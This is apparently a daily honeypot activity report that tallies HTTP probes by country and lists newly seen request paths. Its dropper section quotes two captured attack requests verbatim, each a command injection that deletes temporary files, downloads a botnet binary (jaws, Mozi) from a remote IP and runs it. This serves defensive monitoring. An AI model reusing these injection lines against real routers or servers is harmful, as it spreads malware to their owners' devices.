Daily Report: 2025-06-04#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 39 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1330 requests were recorded during the day, originating from 2 different countries, with a peak of 305 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
US | Israel |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
104.236.3.45 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1 |
1.70.141.84 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.70.141.84:33659/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
212 | 1 | GET /admin/login.asp HTTP/1.1 |
214 | 1 | GET /odinhttpcall1749065828 HTTP/1.1 |
215 | 1 | GET /OdinHttpCall1749065828 HTTP/1.1 |
216 | 1 | GET /Odin/http/call1749065828 HTTP/1.1 |
252 | 1 | GET /odinhttpcall1748998981 HTTP/1.1 |
253 | 1 | GET /OdinHttpCall1748998981 HTTP/1.1 |
254 | 1 | GET /Odin/http/call1748998981 HTTP/1.1 |
287 | 1 | \x04\x01\x01\xBB\x00\x00\x00\x01\x00api.ipify.org\x00 |
288 | 1 | CONNECT api.ipify.org:443 HTTP/1.1 |
313 | 1 | GET /8dhX HTTP/1.1 |
314 | 1 | GET /6z6w HTTP/1.1 |
329 | 1 | GET /db.yml HTTP/1.1 |
330 | 1 | GET /db.yaml HTTP/1.1 |
331 | 1 | GET /db.config HTTP/1.1 |
332 | 1 | GET /dbconfig.php HTTP/1.1 |
341 | 1 | GET /docker-compose.yaml HTTP/1.1 |
342 | 1 | GET /docker-compose.dev.yml HTTP/1.1 |
349 | 1 | GET /serverless.yaml HTTP/1.1 |
350 | 1 | GET /serverless.json HTTP/1.1 |
360 | 1 | GET /config/settings.yml HTTP/1.1 |
388 | 1 | GET /system_info.php HTTP/1.1 |
390 | 1 | GET /swagger.yaml HTTP/1.1 |
391 | 1 | GET /swagger.yml HTTP/1.1 |
393 | 1 | GET /api/swagger.yaml HTTP/1.1 |
394 | 1 | GET /api/swagger.yml HTTP/1.1 |
395 | 1 | GET /api/v1/swagger.json HTTP/1.1 |
396 | 1 | GET /api/v2/swagger.json HTTP/1.1 |
397 | 1 | GET /api/documentation.json HTTP/1.1 |
411 | 1 | GET /vue.config.js HTTP/1.1 |
413 | 1 | GET /webpack.dev.js HTTP/1.1 |
414 | 1 | GET /webpack.prod.js HTTP/1.1 |
418 | 1 | GET /angular-cli.json HTTP/1.1 |
426 | 1 | GET /LlCa HTTP/1.1 |
427 | 1 | GET /OmXI HTTP/1.1 |
436 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xF6~\xF7\x7F\x00\x00\xB0\xF8\xF1s\xCF\x00\x00\x00\xE0\x81\x1B\x7F\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
442 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x8A\xBD\xF7\x7F\x00\x00\x90\xF6\x85\xAA\xAE\x00\x00\x00\xE0\x81\xAF\xBD\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
445 | 1 | GET /odinhttpcall1749060061 HTTP/1.1 |
446 | 1 | GET /OdinHttpCall1749060061 HTTP/1.1 |
447 | 1 | GET /Odin/http/call1749060061 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 305 | US |
1 | 219 | BG |
2 | 130 | DE |
3 | 96 | CN |
4 | 94 | GB |
5 | 61 | JP |
6 | 54 | CA |
7 | 49 | IN |
8 | 48 | HK |
9 | 39 | NL |
10 | 32 | NG |
11 | 24 | PL |
12 | 24 | SA |
13 | 17 | SC |
14 | 15 | PT |
15 | 15 | CH |
16 | 15 | FR |
17 | 12 | AR |
18 | 9 | GH |
19 | 7 | IL |
20 | 5 | TR |
21 | 5 | RU |
22 | 5 | UA |
23 | 5 | BE |
24 | 5 | AO |
25 | 4 | ZA |
26 | 4 | ID |
27 | 3 | KR |
28 | 3 | IT |
29 | 3 | KZ |
30 | 3 | SG |
31 | 2 | RO |
32 | 2 | VN |
33 | 2 | TW |
34 | 2 | BR |
35 | 2 | IE |
36 | 2 | CO |
37 | 2 | HR |
38 | 1 | MC |
39 | 1 | IR |
40 | 1 | ES |
41 | 1 | QA |
42 | 1 | SE |
43 | 1 | CZ |